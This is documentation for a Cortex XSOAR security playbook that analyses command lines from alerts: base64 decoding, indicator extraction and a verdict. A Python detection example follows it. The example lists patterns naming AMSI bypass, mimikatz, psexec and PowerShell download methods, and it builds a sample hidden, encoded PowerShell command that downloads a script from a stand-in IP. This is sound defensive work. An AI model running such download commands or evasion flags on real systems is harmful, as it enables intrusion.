
Command-Line Analysis

This playbook is part of the Common Playbooks Pack.

Supported versions

Supported Cortex XSOAR versions: 6.0.0 and later.

This playbook takes the command line from the alert and performs the following actions:

  • Checks for a base64-encoded string and decodes it if one is found
  • Extracts and enriches indicators from the command line
  • Checks specific arguments for malicious usage

At the end of the playbook, it sets a possible verdict for the command line, based on the findings:

  1. Indicators found in the command line
  2. Found AMSI techniques
  3. Found suspicious parameters
  4. Usage of malicious tools
  5. Indication of network activity
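The three steps and the verdict reasons above, as an added Python example that is not the pack's own playbook code: the regexes are simplified stand-ins for the MatchRegexV2 checks (assumed patterns, not the playbook's), enrichment is left out, and the sample command line is constructed for the example using a TEST-NET-1 address.

```python
import base64
import re

# Simplified stand-ins for the playbook's MatchRegexV2 checks (assumed patterns, not the pack's own).
CHECKS = {
    "AMSI techniques": re.compile(r"amsi", re.I),
    "suspicious parameters": re.compile(r"(?:^|\s)-(?:nop|noprofile|noni|w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?)\b", re.I),
    "malicious tools": re.compile(r"mimikatz|psexec", re.I),
    "network activity": re.compile(r"invoke-webrequest|downloadstring|net\.webclient", re.I),
}
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"']+")


def decode_base64_blobs(cmdline):
    """Step 1: decode base64-looking tokens, trying UTF-16LE (PowerShell -EncodedCommand) then UTF-8."""
    decoded = []
    for blob in BASE64_RE.findall(cmdline):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError: a long plain word, not base64
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isascii() and all(c.isprintable() or c in "\r\n\t" for c in text):
                decoded.append(text)  # keep only readable ASCII, rejecting mis-decodes
                break
    return decoded


def extract_indicators(text):
    """Step 2: extract IPv4 addresses and URLs; enrichment itself is left to XSOAR."""
    return {"ip": sorted(set(IPV4_RE.findall(text))), "url": sorted(set(URL_RE.findall(text)))}


def analyze_commandline(cmdline):
    """Step 3 plus verdict: run every check over the raw and decoded text and collect the reasons."""
    decoded = decode_base64_blobs(cmdline)
    text = " ".join([cmdline, *decoded])
    indicators = extract_indicators(text)
    reasons = (["indicators found"] if any(indicators.values()) else []) + [n for n, rx in CHECKS.items() if rx.search(text)]
    return {"decoded": decoded, "indicators": indicators, "reasons": reasons,
            "verdict": "Suspicious" if reasons else "Benign"}


def sample_commandline():
    """Constructed sample (TEST-NET-1 address): an encoded PowerShell download command."""
    inner = "Invoke-WebRequest -Uri http://203.0.113.5/a.ps1 -OutFile a.ps1"
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(inner.encode("utf-16-le")).decode()
```

Running `analyze_commandline(sample_commandline())` surfaces the URL and IP only after decoding, which is why the playbook decodes before it extracts.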

Dependencies

This playbook uses the following sub-playbooks, integrations, and scripts.

Sub-playbooks

This playbook does not use any sub-playbooks.

Integrations

This playbook does not use any integrations.

Scripts

  • MatchRegexV2
  • Base64Decode
  • Set

Commands

  • enrichIndicators
  • extractIndicators

Playbook Inputs

Name         Description        Default Value   Required
Commandline  The command line.                  Required

Playbook Outputs

Path                Description                                  Type
MatchRegex          The regex found in the command line          unknown
Indicators          Indicators extracted from the command line   unknown
commandline         The command line                             unknown
CommandlineVerdict  The command line verdict                     unknown

Playbook Image

[Image: Command-Line Analysis playbook diagram]